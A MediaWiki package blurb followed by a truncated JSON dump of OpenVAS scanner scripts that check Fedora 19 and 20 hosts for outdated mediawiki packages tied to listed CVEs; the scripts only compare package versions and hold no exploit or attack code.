MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki-1.23.2/README.RPM. Remember to remove the config dir after completing the configuration.
{"openvas": [{"lastseen": "2019-05-29T18:37:11", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-08-27T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-9548", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5243", "CVE-2014-5241", "CVE-2014-5242", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868126", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868126", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-9548\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868126\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-08-27 05:54:27 +0200 (Wed, 27 Aug 2014)\");\n script_cve_id(\"CVE-2014-5241\", \"CVE-2014-5242\", \"CVE-2014-5243\", \"CVE-2014-2853\",\n \"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\", \"CVE-2013-6454\",\n \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-9548\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-9548\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-August/137048.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediawiki'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.23.2~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:30", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-08-27T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-9583", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5243", "CVE-2014-5241", "CVE-2014-5242", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868133", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868133", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-9583\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868133\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-08-27 05:55:03 +0200 (Wed, 27 Aug 2014)\");\n script_cve_id(\"CVE-2014-5241\", \"CVE-2014-5242\", \"CVE-2014-5243\", \"CVE-2014-2853\",\n \"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\", \"CVE-2013-6454\",\n \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-9583\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-9583\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-August/137052.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediawiki'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.23.2~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:25", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-07-07T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-7779", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310867954", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867954", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-7779\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867954\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-07 14:57:00 +0530 (Mon, 07 Jul 2014)\");\n script_cve_id(\"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\",\n \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-7779\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-7779\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-July/135090.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediawiki'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.11~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:39", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-06-17T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-6961", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310867892", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867892", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-6961\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867892\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-06-17 10:01:26 +0530 (Tue, 17 Jun 2014)\");\n script_cve_id(\"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\",\n \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-6961\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-6961\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-June/134116.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediawiki'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.10~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-25T10:48:20", "description": "Check for the Version of mediawiki", "cvss3": {}, "published": "2014-05-12T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-5691", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:867776", "href": "http://plugins.openvas.org/nasl.php?oid=867776", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-5691\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867776);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-05-12 09:10:21 +0530 (Mon, 12 May 2014)\");\n script_cve_id(\"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\",\n \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-5691\");\n\n tag_insight = \"MediaWiki is the software used for Wikipedia and the other Wikimedia\nFoundation websites. Compared to other wikis, it has an excellent\nrange of features and support for high-traffic websites using multiple\nservers\n\nThis package supports wiki farms. Read the instructions for creating wiki\ninstances under /usr/share/doc/mediawiki-1.21.9/README.RPM.\nRemember to remove the config dir after completing the configuration.\n\";\n\n tag_affected = \"mediawiki on Fedora 19\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-5691\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-May/132602.html\");\n script_summary(\"Check for the Version of mediawiki\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.9~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:37:15", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-07-07T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-7805", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310867951", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867951", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-7805\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867951\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-07 12:36:02 +0530 (Mon, 07 Jul 2014)\");\n script_cve_id(\"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\",\n \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-7805\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-7805\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-July/135086.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediawiki'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.11~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:30", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-06-17T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-6962", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310867858", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867858", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-6962\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867858\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-06-17 09:52:37 +0530 (Tue, 17 Jun 2014)\");\n script_cve_id(\"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\",\n \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-6962\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-6962\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-June/134032.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediawiki'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.10~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-25T10:48:57", "description": "Check for the Version of mediawiki", "cvss3": {}, "published": "2014-05-12T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-5684", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:867788", "href": "http://plugins.openvas.org/nasl.php?oid=867788", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-5684\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867788);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-05-12 09:11:11 +0530 (Mon, 12 May 2014)\");\n script_cve_id(\"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\",\n \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-5684\");\n\n tag_insight = \"MediaWiki is the software used for Wikipedia and the other Wikimedia\nFoundation websites. Compared to other wikis, it has an excellent\nrange of features and support for high-traffic websites using multiple\nservers\n\nThis package supports wiki farms. Read the instructions for creating wiki\ninstances under /usr/share/doc/mediawiki/README.RPM.\nRemember to remove the config dir after completing the configuration.\n\";\n\n tag_affected = \"mediawiki on Fedora 20\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-5684\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-May/132655.html\");\n script_summary(\"Check for the Version of mediawiki\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.9~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-02-04T18:49:48", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-05-12T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-5691", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451"], "modified": 